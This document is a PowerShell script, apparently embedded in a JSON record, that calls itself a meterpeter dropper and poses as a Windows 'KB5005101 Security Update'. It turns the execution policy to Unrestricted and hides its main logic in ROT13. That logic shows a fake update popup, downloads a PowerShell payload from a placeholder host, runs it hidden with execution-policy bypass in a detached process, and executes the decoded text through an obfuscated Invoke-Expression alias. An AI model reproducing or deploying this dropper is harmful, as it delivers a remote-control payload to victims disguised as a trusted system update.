    "content": "<#\r\n.SYNOPSIS\r\n   Author: @r00t-3xp10it\r\n   Credits to: @Markus_Fleschut (rot13)\r\n   meterpeter standalone executable dropper\r\n   Change_For_Silent_Exec: [fgevat]`$FvyragRkrp=`\"Gehr`\"\r\n#>\r\n\r\n\r\n$linkinfodll = \"@Se@t-E@xec@uti@onP@oli@cy @UnR@est@rict@ed\" -replace '(@|)',''\r\ncmd /R echo Y|Powershell $linkinfodll -Scope CurrentUser|Out-Null\r\n$Rotten13 = @(\"[PzqyrgOvaqvat(CbfvgvbanyOvaqvat=`$snyfr)] cnenz(\r\n   [fgevat]`$BhgSvyr=`\"`$Rai:GZC\\Hcqngr-XO5005101.cf1`\",\r\n   [fgevat]`$FvyragRkrp=`\"Snyfr`\"\r\n)\r\n\r\n`$FRkrphgrq = `$ahyy\r\n`$ReebeNpgvbaCersrerapr = `\"FvyragylPbagvahr`\"\r\nVs(`$FvyragRkrp -vrd `\"Snyfr`\"){`$HfreFrgGvatf = cbjrefuryy (Arj-Bowrpg -PbzBowrpg Jfpevcg.Furyy).Cbchc(`\" Srngher hcqngr `a`aGUVF FBSGJNER VF CEBIVQRQ OL GUR ERTRAGF NAQ PBAGEVOHGBEF ``NF VF'' NAQ NAL RKCERFF BE VZCYVRQ JNEENAGVRF, VAPYHQVAT, OHG ABG YVZVGRQ GB GUR VZCYVRQ JNEENAGVRF BS ZREPUNAGNOVYVGL NAQ SVGARFF SBE N CNEGVPHYNE CHECBFR NER QVFPYNVZRQ. VA AB RIRAG FUNYY GUR ERTRAGF BE PBAGEVOHGBEF OR YVNOYR SBE NAL QVERPG, VAQVERPG, VAPVQRAGNY, FCRPVNY, RKRZCYNEL, BE PBAFRDHRAGVNY QNZNTRF (VAPYHQVAT, OHG ABG YVZVGRQ GB, CEBPHERZRAG BS FHOFGVGHGR TBBQF BE FREIVPRF; YBFF BS HFR, QNGN, BE CEBSVGF; BE OHFVARFF VAGREEHCGVBA) UBJRIRE PNHFRQ NAQ BA NAL GURBEL BS YVNOVYVGL, JURGURE VA PBAGENPG, FGEVPG YVNOVYVGL, BE GBEG (VAPYHQVAT ARTYVTRAPR BE BGUREJVFR) NEVFVAT VA NAL JNL BHG BS GUR HFR BS GUVF FBSGJNER, RIRA VS NQIVFRQ BS GUR CBFFVOVYVGL BS FHPU QNZNTR.`\",6,`\" Frpher XO4569132 Hcqngr`\",1+0)}\r\nvje -Hev `\"uggc://CharlieBrown/Hcqngr-XO5005101.cf1`\" -BhgSvyr `\"`$BhgSvyr`\" -HfreNtrag `\"Zbmvyyn/5.0 (Naqebvq; Zbovyr; ei:40.0) Trpxb/40.0 Sversbk/40.0`\"|Bhg-Ahyy\r\n\r\nFgneg-Fyrrc -Zvyyvfrpbaqf 300;`$n = Trg-Qngr\r\ngel{#Rkrphgr zrgrecrgre pyvrag.cf1 va n puvyq cebprff qrgnpu sebz cnerag cebprff (onpxtebhaq)\r\n   Fgneg-Cebprff cbjrefuryy.rkr -JvaqbjFglyr Uvqqra -NethzragYvfg `\"-rkrp olcnff -Svyr 
`$BhgSvyr`\"|Bhg-Ahyy\r\n}pngpu{}\");$rdata = $null\r\n$Rotten13.ToCharArray() | ForEach-Object {If((([int] $_ -ge 97) -and ([int] $_ -le 109)) -or (([int] $_ -ge 65) -and ([int] $_ -le 77))){$rdata += [char] ([int] $_ + 13)}ElseIf((([int] $_ -ge 110) -and ([int] $_ -le 122)) -or (([int] $_ -ge 78) -and ([int] $_ -le 90))){$rdata += [char] ([int] $_ - 13)}Else{$rdata += $_}}\r\ntry{echo \"$rdata\"|&(DIR Alias:/I*X)}catch{powershell (New-Object -ComObject Wscript.Shell).Popup(\"Fail to execute KB5005101.exe Update Package\",5,\"                           KB5005101 Security Update\",0+16)}\r\n\r\n\r\n"
  }
]